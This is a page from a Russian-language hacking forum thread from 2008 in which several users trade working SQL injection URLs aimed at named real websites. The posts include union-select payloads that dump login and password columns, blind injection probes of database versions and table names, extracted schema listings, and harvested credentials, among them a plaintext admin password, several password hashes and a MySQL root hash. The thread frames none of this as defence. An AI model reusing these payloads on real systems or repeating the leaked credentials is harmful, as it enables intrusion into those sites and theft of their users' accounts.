ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #6871  
Старый 17.11.2008, 03:49
Аватар для plutus
plutus
Новичок
Регистрация: 03.11.2008
Сообщений: 25
Провел на форуме:
34070

Репутация: 20
По умолчанию

http://www.youplusw ephotography.com/blog/index.php?category=-3+union+select+1,concat_ws(0x3a,login,password,re g_date,last_date,sess),3+from+user s+limit+1,1--

http://tripleco rd.com/news/index.php?link=73&cat=-2+union+select+1,concat_ws(0x3a,login,password),3+ from+users+limit+1,1--

http://www.kevin swan.com/slog/index.php?category=-3+union+select+1,concat_ws(0x3a,login,password),3+ from+users--

http://www.shar alana.com/blog/index.php?link=20&cat=-4+union+select+1,concat_ws(0x3a,login,password),3+ from+users--

http://www.beb bblog.com/index.php?category=-4+union+select+1,concat_ws(0x3a,login,password),3+ from+users/*

Последний раз редактировалось plutus; 17.11.2008 в 04:02..
 
Ответить с цитированием

  #6872  
Старый 17.11.2008, 04:07
Аватар для -m0rgan-
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Код:
http://www.albanianroyalfamily.com/index.php?faqe=shfaqlajm&lajmid=-9999+union+all+select+1,2,convert(concat_ws(char(58),username,password)+using+utf8),4,null,6,null,8,9+from+login--
логин/пасс:
Код:
admin:mbreti
-------------------------------------------
Код:
http://www.gazeta-standard.com/tekst.php?idt=6342+and+1=2+union+all+select+1,concat(username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+editor--
логин/пасс:
Код:
admin:62a90ccff3fd73694bf6281bb234b09a
-------------------------------------------
Код:
http://www.gazetaetiranes.com.al/print.php?lajmID=922'+union+select+1,2,concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14+from+user/*
логин/пасс:
Код:
admin-gt:2fa4b2f3e0acb4e59e02d060db05da74
----------------------------------------------
Код:
http://www.reutov.net/iss/photo_news/news/newsone.php?id=-394%20union%20select%201,2,3,4,concat_ws(char(58),name,pass),6,7,8,9+from+users+limit+1,1/*
логин/пасс:
Код:
drupal:9536bdcd9e3faa581d6991b5d04ac4ec
--------------------------------------------
Код:
http://www.ktpae.gr/declaration_more.php?decl_id=-172+union+select+1,concat_ws(char(58),user,password),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1+from+mysql.user/*
логин/пасс:
Код:
root:*3225EBFDCE9E60181BB8157769BC1EF316DC15D0
---------------------------------------------
The End!
 
Ответить с цитированием

  #6873  
Старый 17.11.2008, 06:14
Аватар для Calcutta
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
Отправить сообщение для Calcutta с помощью ICQ
По умолчанию

http://shop.health-beauty.ca/content.php?TextID=1+and+substring(version(),1,1)= 4

version()=4
 
Ответить с цитированием

  #6874  
Старый 17.11.2008, 06:31
Аватар для truelamer
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782

Репутация: 81
По умолчанию

http://www.mapcentre.ru/index.php?productID=1276+or+ascii(lower(substr(ver sion(),1,1)))=53--%20

5 ветка


http://www.mapcentre.ru/index.php?productID=1276+or+ascii(lower(substr((se lect+table_name+from+INFORMATION_SCHEMA.TABLES+lim it+16,1),1,1)))=118--%20

т.е имя 16 таблицы начинается с буквы 'v', view)))

ну и так далее? как говориться курочка по зернышку....)
 
Ответить с цитированием

  #6875  
Старый 17.11.2008, 09:17
Аватар для pingvincible
pingvincible
Новичок
Регистрация: 03.11.2008
Сообщений: 5
Провел на форуме:
66983

Репутация: 5
По умолчанию

Код:
http://www.comingsoon.net/films.php?id=11750+and+ascii(lower(substring(user(),1,1)))<=100+#+
user: comingso_nextra
database: comingso_nextra
version: 4

не дает юзать union select.
 
Ответить с цитированием

  #6876  
Старый 17.11.2008, 10:22
Аватар для DimOnOID
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585

Репутация: 441
Отправить сообщение для DimOnOID с помощью ICQ
По умолчанию

http://deti.mail.ru/nyanya?type=2+and+substring(version(),1,1)=4
version(): 4.0
http://deti.mail.ru/lineyki?edit=[id вашей созданной линейки]+and+substring(version(),1,1)=4
 
Ответить с цитированием

  #6877  
Старый 17.11.2008, 17:05
Аватар для Sindicat
Sindicat
Новичок
Регистрация: 14.11.2008
Сообщений: 12
Провел на форуме:
42624

Репутация: 10
По умолчанию

Удалите сообщение не туда написал
 
Ответить с цитированием

  #6878  
Старый 17.11.2008, 17:53
Аватар для DezMond™
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

http://www.edreams.es/vueltaalmundo/post.php?id_post=1+union+select+ 1,2,concat_ws(0x3a3a,TABLE_NAME),4,5+from+informat ion_schema.tables+l imit+25,2/*
---------------------------------
table:
usuario
votos_final
voto
video
ultimasvisitas
postcomentario
post
perfil
foto
CHARACTER_SETS
experiencia
ed_languages
ed_countries_text
comentario
VIEWS
USER_PRIVILEGES
TRIGGERS
TABLE_PRIVILEGES
TABLE_CONSTRAINTS
TABLES
STATISTICS
SCHEMA_PRIVILEGES
SCHEMATA
ROUTINES
KEY_COLUMN_USAGE
COLUMN_PRIVILEGES
COLUMNS
COLLATION_CHARACTER_SET_APPLICABILITY
COLLATIONS
CHARACTER_SETS
----------------------
column:
COLLATION_NAME
MAXLEN
DESCRIPTION
DEFAULT_COLLATE_NAME
CHARACTER_SET_NAME


http://www.edreams.es/vueltaalmundo/post.php?id_post=1+union+select+ 1,2,concat_ws(0x3a3a,login,password),4,5+from+usua rio+ limit+0,1/*
 
Ответить с цитированием

  #6879  
Старый 17.11.2008, 18:09
Аватар для DezMond™
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

http://www.librenet.net/forum/post.php?id_post=652+union+select+1,2,concat_ws(0x 3a3a,COLUMN_NAME),4,5,6,7,8+from+inf ormation_schem a.columns/*&id_topic=41

http://www.librenet.net/forum/post.p hp?id_post=652+union+select+1,2,concat_ws(0x3a3a,p ass_user,login_user),4,5,6,7,8+from +user/*&id_topic=41

columnass_user login_user
table:USER_PRIVILEGES administre_serveur moderation user


c3dric::6cc8260ee2bcc56083a35cd98b775f02(23041983)
 
Ответить с цитированием

  #6880  
Старый 17.11.2008, 18:28
Аватар для DezMond™
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

http://belarusgo.com/view_subsection.php?page=2&id_subsection=68&id_cit y=9&id_section=-13+union+s elect+1,2,concat_ws(0x3a3a,login_user,password_use r),4,5,6 +from+user--
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ